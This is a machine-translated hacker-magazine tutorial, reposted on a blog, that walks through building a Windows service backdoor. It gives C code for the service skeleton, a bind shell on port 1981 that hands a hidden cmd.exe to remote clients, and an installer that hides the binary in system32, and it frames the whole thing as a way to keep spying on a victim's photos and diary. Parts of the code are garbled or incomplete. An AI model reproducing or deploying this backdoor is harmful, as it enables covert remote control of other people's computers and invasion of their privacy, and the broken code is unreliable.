Most of the previous Trojans/ Back door are all through the modification of the system INI file (such as Win.ini,system.ini) or modify the registry of the run value to achieve self-start, there is more simple to modify the Autobat.exe (Boss, the earth is not for you, you still Temper star bar), but with the network user security awareness of the improvement, even my home side selling tea egg Aunt all know how to deal with these old methods. In order to adapt to the new era Trojan backdoor technology development requirements, a use of Windows NT/2000/XP System services of the backdoor generated, now Winshell,wineggdrop, and other well-known telnte extension backdoor all use this way. I believe many of the side-door technology is not familiar with this, so, I am here to fill a big head, to teach the industry to solve the doubts it (victim mm eyes dull, a face despair: With you these people, when the world can "no thieves" Ah? )。
Front-facing principle
Windows NT/2000/XP provides services that can refer to either a specific Win32 process or a kernel-mode device driver. A component of the operating system, known as the Service Control Manager SCM, is used to load and control both types of services. Of course, the service we say refers to the former, that is, the service we can use is a program executed under Windows NT/2000/XP. When we open the "Control Panel" management tool? service, you can see a bunch of services on the right, as shown in 1. Each row specifies the properties of a particular service, including name, description, status, Startup type, logon method, and so on.
Figure 1
The service itself is a reasonable choice for client/server software under Windows NT/2000/XP because it provides the equivalent of a background program like Unix daemons (daemon) and makes it possible to create programs that can perform high-privilege operations on behalf of users with low permissions. Like our well-known RPC service, virus scanners and backup programs are well suited as service processes.
The service can be used by us as a backdoor to implement self-booting because it has three very important features:
1. The service can be designated as self-booting, on the basis of the traditional registry to modify the Run key value, add INI self-starter and other methods based on a choice.
2. The service can start running before any user logs in, and we can add code to kill the firewall when the service starts.
3. Service is running in the background, if not pay attention to, God knows when to be someone else to install the back door.
Most services are managed by an information database maintained in the registry by the Service control program, and each service can find a key item in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services. The main thing that distinguishes a service from a general Windows NT/2000/XP program is the cooperation between the service and the Service Control Manager, which we will experience in the subsequent programming.
Programming implementation
A complete service is divided into the installation service program, the principal service program and the uninstall service program. Let's write the main body of the service first, the sample code is as follows:
void Main ()
{
Service_table_entry servicetable[] =
{
{"Scuhkr", Bdservicemain},
{NULL, NULL}//"Sentinel"
};
Connecting to the Service Control Manager
StartServiceCtrlDispatcher (servicetable);
}
Passers-by: what, it's so short? You want to insult the wisdom of the vast majority of birds? Oh, don't worry, listen to me slowly: The above code, we first give a service_table_entry structure array, each member describes the invocation process provides services, here we only installed a service named SCUHKR service, the back of the Bdservicemain ( We call it the service main function, which provides the service entry address through the callback function, and its prototype parameters must be defined as follows:
VOID WINAPI bdservicemain (
DWORD DWARGC, // LPSZARGV number of parameters
lptstr* lpszargv //The first parameter of the array specifies the service name, which can be later
StartService () to invoke
); The
Service_table_entry structure array requires that the last member group be NULL, which we call "Sentinel" (all values are null), representing the end of the service table. Once a service is started, call StartServiceCtrlDispatcher () to notify the service control program that the service is executing and provide the address of the service function. StartServiceCtrlDispatcher () requires only an array of at least two service_table_entry structures, which starts a thread for each service and waits until they end to return.
This program only provides a service function Bdservicemain (), below we will complete the function, the sample code is as follows:
void WINAPI Bdservicemain (DWORD dwargc, LPTSTR *lpszargv)
{
dword dwthreadid; //Store thread ID
//through RegisterServiceCtrlHandler () to establish a communication protocol with the Service control program.
//bdhandler () is our service control program, which can be used to start, pause, resume, stop services, and other controls
if (! Servicestatushandle = RegisterServiceCtrlHandler ("Scuhkr",
bdhandler))
return;
//Indicates that the service is private
ServiceStatus.dwServiceType = service_win32_own_process;
Initialize service, starting
ServiceStatus.dwCurrentState = service_start_pending;//
//service acceptable request, Here we only accept stop service request and Pause recovery request
ServiceStatus.dwControlsAccepted = Service_accept_stop
| Service_accept_pause_continue;
//The next few general we don't care about, all 0
servicestatus.dwservicespecificexitcode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
//Must call SetServiceStatus () in response to each request notification of the Service Control program
setservicestatus (Servicestatushandle, &servicestatus) ;
Start running the service
Servicestatus.dwcurrentstate = service_running;
Servicestatus.dwcheckpoint = 0;
Servicestatus.dwwaithint = 0;
SetServiceStatus (Servicestatushandle, &servicestatus);
We use an Event object to control the synchronization of the service
if (! ( Hevent=createevent (null, FALSE, FALSE, null)))
Return
Servicestatus.dwcurrentstate = service_start_pending;
Servicestatus.dwcheckpoint = 0;
Servicestatus.dwwaithint = 0;
SetServiceStatus (Servicestatushandle, &servicestatus);
The thread to start our backdoor program
if (! ( Hthread=createthread (NULL, 0, (Lpthread_start_routine) Mainfn, (LPVOID) 0, 0, &dwthreadid)))
Servicestatus.dwcurrentstate = service_running;
Servicestatus.dwcheckpoint = 0;
Servicestatus.dwwaithint = 0;
WaitForSingleObject (hevent, INFINITE);
CloseHandle (Hthread);
ExitThread (dwThreadID);
CloseHandle (hevent);
Return
}
Above we call a service control function Bdhandler (), because it is just a simple introduction, we only deal with the service stop control request situation, other pauses, recovery and other functions, the reader can improve their own. The following is the implementation code for Bdhandler ():
void WINAPI Bdhandler (DWORD dwcontrol)
{
switch (dwcontrol)
{
case service_control_stop:
//wait for the backdoor to stop
servicestatus.dwcurrentstate = Service_stop_ PENDING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
setservicestatus (Servicestatushandle, &servicestatus);
Set the time to the excited state, waiting for the next event to arrive
setevent (hevent);
servicestatus.dwcurrentstate = Service_stop;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
//Stop
setservicestatus (Servicestatushandle, &servicestatus);
break;
default:
break;
}
}
Service control function is done, the following is left behind the main door function. This program borrowed n many predecessors turned over countless backdoor procedures, by opening a port to listen, allow any remote host connected to the port to establish a trust connection, and provide an interactive shell. In order to clear the code, I removed the error check, the whole process is very simple, there is no more explanation, black defense on the N period introduced, the code is as follows:
DWORD WINAPI Mainfn (LPVOID lpparam)
{
Wsadata Wsadata;
struct sockaddr_in remoteaddr;
DWORD dwthreadida,dwthreadidb,dwthreadparam=0;
Process_information ProcessInfo;
Startupinfo StartInfo;
WSAStartup (Makeword (2,2), &wsadata);
ServerSocket = socket (af_inet, sock_stream, ipproto_tcp);
remoteaddr.sin_family = af_inet;
Remoteaddr.sin_port = htons (1981); Listening port
Remoteaddr.sin_addr. S_un. S_ADDR = Inaddr_any;
Bind (ServerSocket, (LPSOCKADDR) &remoteaddr,sizeof (remoteaddr));
Listen (ServerSocket, 2);
VarA = 0;
Varb = 0;
CreateThread (null, 0, Threadfunca, NULL, 0, &dwthreadida);
CreateThread (null, 0, THREADFUNCB, NULL, 0, &DWTHREADIDB);
Dowhile ((VarA | | varb) = = 0);
Getstartupinfo (&startinfo);
Startinfo.dwflags = startf_useshowwindow| Startf_usestdhandles;
Startinfo.hstdinput = Hreadpipe;
Startinfo.hstderror = Hwritepipe;
Startinfo.hstdoutput = Hwritepipe;
Startinfo.wshowwindow = Sw_hide; Hide Console window
Char szapp[256];
GetSystemDirectory (szapp,max_path+1);
strcat (Szapp, "\\cmd.exe");
Open cmd Process
if (CreateProcess (Szapp, NULL, NULL, NULL, TRUE, 0,
NULL, NULL, &startinfo, &processinfo) = = 0)
{
printf ("CreateProcess error!\n");
return-1;
}
while (true)
{
Clientsocket = Accept (serversocket, NULL, NULL);
Sleep (250);
}
return 0;
}
//Thread function A, through pipe A to accept input from the control side, and then write to the control input
DWORD WINAPI Threadfunca (lpvoid lpparam)
{
security_ ATTRIBUTES pipeattr;
dword Nbytetowrite, Nbytewritten;
char recv_buff[1024];
pipeattr.nlength = sizeof (security_attributes);
pipeattr.lpsecuritydescriptor = NULL;
pipeattr.binherithandle = TRUE;
createpipe (&hreadpipe,
&hwritefile,
&pipeattr,
 0);
vara = 1;
while (True)
{
sleep ();
nbytetowrite = recv (Clientsocket,
recv_buff,
1024,
   0);
printf ("%s\n", Recv_buff);
writefile (Hwritefile,
recv_buff,
nbytetowrite,
&nbytewritten,
null);
}
return 0;
}
//thread function B, through pipe B to accept input from the controlled side, and then write to the control output
DWORD WINAPI threadfuncb (lpvoid lpparam)
{
security_ ATTRIBUTES pipeattr;
dword Len;
char send_buff[25000];
pipeattr.nlength = sizeof (security_attributes);
pipeattr.lpsecuritydescriptor = NULL;
pipeattr.binherithandle = TRUE;
createpipe (&hreadfile,
&hwritepipe,
&pipeattr,
0);
varb = 1;
while (True)
return 0;
}
After we successfully invaded the target mm host, looked at the MM photo, read the diary of MM ... There are 30 articles of evil. Before the beat to leave, how also to leave a back door, convenient next time to continue to see new photos, continue to read the small secret mm (hehe, we do not misunderstand, I never do this kind of thing D). How do you keep the back door? We've written all the main parts, and we haven't installed them yet. The part of the installation service is actually very simple, the sample code is as follows:
InstallService.cpp
void Main ()
{
Sc_handle Hscmanager = NULL,//service Control Manager handle
Hservice = NULL; Service Handle
Char szsyspath[max_path]=,
szexepath[max_path]=; We want to put our backstage execution of the program here, generally in the \\admin$\\system32\, hidden high
if (Hscmanager = OpenSCManager (NULL,//null indicates that the local host
NULL,//To open the Service control management database, default to Empty
sc_manager_create_service//Create permissions
)) ==null)
{
pirntf ("OpenSCManager failed\n");
Return
}
GetSystemDirectory (Szsyspath, MAX_PATH); Get the system directory, which is system32 inside, concealed.
strcpy (Szexepath, Szsyspath);
strcat (Szexepath, "Scuhkr.exe"); Application Absolute Path
if (Hservice=createservice (Hscmanager,//handle to the Service control management database
"SCUHKR",//service name
"Scuhkr Backdoor Service",//Display name
Service_all_access,//All access rights
Service_win32_own_process,//private type
Service_demand_start,//self-starting type Service_error_ignore,//Ignore error handling
Szexepath,//application path
Null
Null
Null
Null
NULL)) = = null)
{
printf ("%d\n", GetLastError ());
Return
}
Let the service run immediately. If it is a server, 10 days and half a month do not restart, is not dead end?
if (StartService (hservice, 0, NULL) = = FALSE)
{
printf ("StartService failed:%d\n", GetLastError ());
Return
}
printf ("Install service successfully\n");
Closeservicehandle (Hservice); Close the service handle
Closeservicehandle (Hscmanager); Close the service management database handle
}
Ok, everything is finished, we test on this machine, the front of the service principal program Scuhkr.exe copy to the system directory \system32 (if you need to automatically implement the self-copy of the program, can be achieved through CopyFile (), specifically how do I do not talk about it, Believe that the smart you rinsed can be done, do not go to find WinShell source code to see it), and then execute InstallServcie.exe. In order to see if we succeed in installation, there are two ways, one is through the control Panel, management tools, services, and the second is the use of the system under the console of the Sc.exe tools, such as: "Sc.exe QC RPCSS", 2 shown. See the information about the installation service? Isn't it simple!
Figure 2
As for the future do not want this mm chicken, and do not want to leave a handle or something, to delete the service to do? The reader is practicing for himself. There is one thing to say is that I was cramming, crazy eating a few days about NT system Services programming, if there is anything wrong, welcome everyone to criticize correct!
(The procedure involved in the article has been included in the magazine supporting CD "Magazine related" column, according to the article name can be found)
Http://www.cnblogs.com/lzjsky/archive/2010/09/06/1819053.html
Service-level backdoor do it yourself-Create service